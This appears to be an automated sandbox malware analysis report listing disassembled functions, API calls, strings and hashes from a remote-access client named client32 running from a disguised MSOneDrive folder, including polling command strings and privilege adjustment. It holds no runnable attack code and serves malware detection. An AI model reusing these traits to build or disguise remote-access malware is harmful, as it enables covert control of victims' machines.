1112a185-1112a18b 2652->2660 2653->2630 2654->2630 2676 11129e9a-11129e9c 2655->2676 2677 11129e6e-11129e98 EnableWindow call 111228e0 * 2 EnableWindow 2655->2677 2657->2610 2658 11129f3b-11129f56 GetForegroundWindow call 111228e0 * 2 2657->2658 2700 11129f67-11129f70 EnableWindow 2658->2700 2701 11129f58-11129f5e 2658->2701 2666 1112a196-1112a19e 2660->2666 2667 1112a18d-1112a193 call 11123160 2660->2667 2690 1112a048-1112a04f 2664->2690 2691 1112a02d-1112a03e GetLastError call 111356e0 2664->2691 2665->2664 2689 1112a015 2665->2689 2674 1112a1a0-1112a1a3 2666->2674 2675 1112a1ac call 11122e30 2666->2675 2667->2666 2683 1112a1b1-1112a1b7 2674->2683 2684 1112a1a5-1112a1aa call 11122f00 2674->2684 2675->2683 2676->2645 2679 11129e9e-11129ea4 2676->2679 2677->2676 2679->2645 2688 11129ea6-11129ea7 SetForegroundWindow 2679->2688 2693 1112a2a8-1112a2b3 call 11129720 2683->2693 2694 1112a1bd-1112a1c3 2683->2694 2684->2683 2688->2645 2689->2664 2704 1112a0c2 2690->2704 2705 1112a051-1112a06c 2690->2705 2691->2690 2713 1112a2d4-1112a2dc 2693->2713 2714 1112a2b5-1112a2c7 call 1105f080 2693->2714 2697 1112a260-1112a268 2694->2697 2698 1112a1c9-1112a1d1 2694->2698 2697->2693 2709 1112a26a-1112a298 call 1103db30 call 1103dbb0 call 1103dbd0 call 1103db90 2697->2709 2698->2693 2707 1112a1d7-1112a1dd 2698->2707 2700->2610 2701->2700 2710 11129f60-11129f61 SetForegroundWindow 2701->2710 2704->2622 2712 1112a06f-1112a07b 2705->2712 2707->2693 2715 1112a1e3-1112a1fa call 11102870 2707->2715 2748 1112a2a2 2709->2748 2749 1112a29a-1112a29e 2709->2749 2710->2700 2717 1112a096-1112a0a3 call 11132680 2712->2717 2718 1112a07d-1112a091 call 1107c3b0 2712->2718 2713->2608 2714->2713 2728 1112a2c9-1112a2cf call 111316c0 2714->2728 2729 1112a21f 2715->2729 2730 1112a1fc-1112a21d call 11052f90 2715->2730 2717->2704 2736 1112a0a5-1112a0c0 GetLastError call 111356e0 2717->2736 2718->2717 2733 1112a093 2718->2733 2728->2713 2738 1112a221-1112a25e call 1103daf0 call 11045a30 call 11045aa0 call 1103db50 2729->2738 2730->2738 2733->2717 2736->2628 2738->2693 2748->2693 2749->2748
                                                        APIs
                                                        • IsWindow.USER32(0001042A), ref: 11129E01
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129E0F
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129E47
                                                        • GetForegroundWindow.USER32 ref: 11129E62
                                                        • EnableWindow.USER32(0001042A,00000000), ref: 11129E7C
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129E98
                                                        • SetForegroundWindow.USER32(00000000), ref: 11129EA7
                                                        • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11129EE5
                                                        • IsWindowVisible.USER32(00000000), ref: 11129EF4
                                                        • IsWindowVisible.USER32(0001042A), ref: 11129F24
                                                        • IsIconic.USER32(0001042A), ref: 11129F31
                                                        • GetForegroundWindow.USER32 ref: 11129F3B
                                                          • Part of subcall function 111228E0: ShowWindow.USER32(0001042A,11129D52,?,11129D52,00000007,?,?,?,?,?,00000000), ref: 111228EE
                                                        • SetForegroundWindow.USER32(00000000), ref: 11129F61
                                                        • EnableWindow.USER32(0001042A,00000001), ref: 11129F70
                                                        • GetLastError.KERNEL32 ref: 1112A02D
                                                        • GetLastError.KERNEL32 ref: 1112A0A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ForegroundVisible$Enable$ErrorLast$FindIconicShow
                                                        • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$Reactivate main window$Shell_TrayWnd$disableRunplugin
                                                        • API String ID: 3497382234-2745087410
                                                        • Opcode ID: 03e229f3001578359e413258553aba7f5d85a076d8a2a6da1e0c262e5ead9f6f
                                                        • Instruction ID: 89bfc5eb453e7e361dc174284ec43732ba9e27439f8ef9c29a8ac0fe06485c00
                                                        • Opcode Fuzzy Hash: 03e229f3001578359e413258553aba7f5d85a076d8a2a6da1e0c262e5ead9f6f
                                                        • Instruction Fuzzy Hash: 0CD13435A01231AFDF10DF24DD89F9AF762AB80B4CFA04539EC1957288EF716840CB92
                                                        Function 11081000 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108108C
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110810AA
                                                        • LoadLibraryA.KERNEL32(?), ref: 110810EC
                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11081107
                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108111C
                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108112D
                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108113E
                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108114F
                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11081160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                        • API String ID: 2201880244-3035937465
                                                        • Opcode ID: 0a76712465da8a1f89cb356c9f725acde3d7fc538e30262e756dcc55fc0ce3ce
                                                        • Instruction ID: 5e0f03c7a272b42dabbdc436788095eb74915ed0ff03ab5e2eae34a55ab18380
                                                        • Opcode Fuzzy Hash: 0a76712465da8a1f89cb356c9f725acde3d7fc538e30262e756dcc55fc0ce3ce
                                                        • Instruction Fuzzy Hash: 7751B378E0870A9FD711DF7ACC90AA6FBF8AF55314B1189AED8A5C7640DA70E580CF50
                                                        Function 6C815A28 Relevance: 22.8, APIs: 3, Strings: 10, Instructions: 81synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini), ref: 6C815A70
                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C815A80
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C815B26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: CreateHandleModuleMutexPrivateProfile
                                                        • String ID: C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini$Trace$TraceFile$TraceRecv$TraceSend$_debug$htctl.packet_tracing$mode$nsmtrace$pci.ini
                                                        • API String ID: 2872646933-1634281601
                                                        • Opcode ID: 3a145e10b277d7dd7f98602bfaa6678b4153f5d4d1a110da4e054b4b40d8b7ed
                                                        • Instruction ID: 91ec5c5e8e5a35a3ccea35b302cb67ffbeb0ff71c2f6b69e53a59708815eb758
                                                        • Opcode Fuzzy Hash: 3a145e10b277d7dd7f98602bfaa6678b4153f5d4d1a110da4e054b4b40d8b7ed
                                                        • Instruction Fuzzy Hash: D02160B4684359AFE730BF646F94A573BA8A66624CB149C39E458D3F03E7346808D7D0
                                                        Function 6C811780 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemTime.KERNEL32(?,?,?,937B5537,DB83AE95,937B54B7,FFFFFFFF,00000000), ref: 6C811831
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C81183B
                                                        • GetSystemTime.KERNEL32(?,DB83AE95,937B54B7,FFFFFFFF,00000000), ref: 6C811875
                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C81187F
                                                        • EnterCriticalSection.KERNEL32(6C849898,?,937B5537), ref: 6C811909
                                                        • LeaveCriticalSection.KERNEL32(6C849898), ref: 6C81191B
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C811990
                                                          • Part of subcall function 6C81A090: __strdup.LIBCMT ref: 6C81A0AA
                                                          • Part of subcall function 6C81A170: _free.LIBCMT ref: 6C81A19D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                        • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                        • API String ID: 1510130979-3441452530
                                                        • Opcode ID: 33434caaf5d8d7b4fea33e01ccf67d54e9fb9794de6aaf5812c6ad881af631a3
                                                        • Instruction ID: e6aff1ff178197c77b51d642ce02968ec28f133900aac9b4f9a0c860d2ca4472
                                                        • Opcode Fuzzy Hash: 33434caaf5d8d7b4fea33e01ccf67d54e9fb9794de6aaf5812c6ad881af631a3
                                                        • Instruction Fuzzy Hash: DC616171904219AFDB24DFE4DA80EEEB7B9FB48314F448D2DE415A7B40DB34A508CBA1
                                                        Function 11134460 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 139registryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                        • _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        • _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11152C8A: __isdigit_l.LIBCMT ref: 11152CAF
                                                        • RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                        • String ID: CSDVersion$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                        • API String ID: 3299820421-3310072378
                                                        • Opcode ID: 7ab92e51ad01e1907d7b427f1449cbf7b293f8cedb1a70cc30572aa3416370ee
                                                        • Instruction ID: 3b0f4771cf844cdb0b0f75355f5e50aa58b9dccac0828de2761a27a020c1cb56
                                                        • Opcode Fuzzy Hash: 7ab92e51ad01e1907d7b427f1449cbf7b293f8cedb1a70cc30572aa3416370ee
                                                        • Instruction Fuzzy Hash: 2D416E79E50215ABDF20CF60CC44FDEFBB49B8531DF100568F91956688E6307940CF91
                                                        Function 1108F8C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 1108F8D4
                                                        • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?), ref: 1108F8E7
                                                        • CoCreateInstance.OLE32(?,00000000,00000001,111AC67C,?), ref: 1108F904
                                                        • CoUninitialize.COMBASE ref: 1108F922
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFromInitializeInstanceProgUninitialize
                                                        • String ID: HNetCfg.FwMgr$ICF Present:
                                                        • API String ID: 3222248624-258972079
                                                        • Opcode ID: e60eba5eeb344acb8759f58af3e6bf86e3ef3d66aa5fb3739c6cfdd7dd58bbd8
                                                        • Instruction ID: 770ce8111ca66446bd8ca763adae3b9fe85744b9a4d07a8ee584aead76b08d87
                                                        • Opcode Fuzzy Hash: e60eba5eeb344acb8759f58af3e6bf86e3ef3d66aa5fb3739c6cfdd7dd58bbd8
                                                        • Instruction Fuzzy Hash: 5801A175F015197FDB00DBB58C49AEFBB78AF05608F10406CFA55D7104EA31EA0087E2
                                                        Function 1106DED0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                        • API String ID: 2102423945-35127696
                                                        • Opcode ID: c3ecfa7420b948e47ebb5e2de70d7ea8b1f3f183f60ef3a79e0d604a368113f0
                                                        • Instruction ID: 1a78bdd532166b519948713500080bf5a329ee9b8eb99bc9d5adcd4aa2325004
                                                        • Opcode Fuzzy Hash: c3ecfa7420b948e47ebb5e2de70d7ea8b1f3f183f60ef3a79e0d604a368113f0
                                                        • Instruction Fuzzy Hash: 7AB19075E00615AFE704CFA8DC81FEEB7F9FF88304F148169E9199B295DA70A941CB90
                                                        Function 1102F520 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(1102CBF0,?,00000000), ref: 1102F544
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                        • API String ID: 3192549508-611217420
                                                        • Opcode ID: 4eab6215739f9884cf541315221468652090f083f0c597e6065554ff95b3bc8c
                                                        • Instruction ID: c0b43f1959f31bc3ff899fb62870b938a0e0ae705628d7a6d3f14f32828bbd8a
                                                        • Opcode Fuzzy Hash: 4eab6215739f9884cf541315221468652090f083f0c597e6065554ff95b3bc8c
                                                        • Instruction Fuzzy Hash: 12F04F74900122DFC706DF69EC94A8DF7A1EF5860CB148539EC1457348EB7069008B95
                                                        Function 11096C50 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,?,00000000), ref: 11096C88
                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11096CA4
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,111DA704,?,00000001,00000001), ref: 11096CD0
                                                        • EqualSid.ADVAPI32(?,0109D280,?,00000001,00000001), ref: 11096CE3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                        • String ID:
                                                        • API String ID: 1878589025-0
                                                        • Opcode ID: 3513740187f7c4b306437e11a9b873ce9c80dec7f112a18a8bdffc49cb84d1ba
                                                        • Instruction ID: aa5dce42b75e03a3a8ef6c037090e6362b52afdfa5aa590746b819f611b8b8b3
                                                        • Opcode Fuzzy Hash: 3513740187f7c4b306437e11a9b873ce9c80dec7f112a18a8bdffc49cb84d1ba
                                                        • Instruction Fuzzy Hash: EB215075F01219AFEB00DBA5DD91BFEB7B8EF45704F114069ED29D7180E671A900CBA1
                                                        Function 11095790 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,1102E62B,00000000,00000000,00080000,82E0FB89,00080000,00000000,00000000), ref: 110957BD
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 110957C4
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 110957D5
                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 110957F9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                        • String ID:
                                                        • API String ID: 2349140579-0
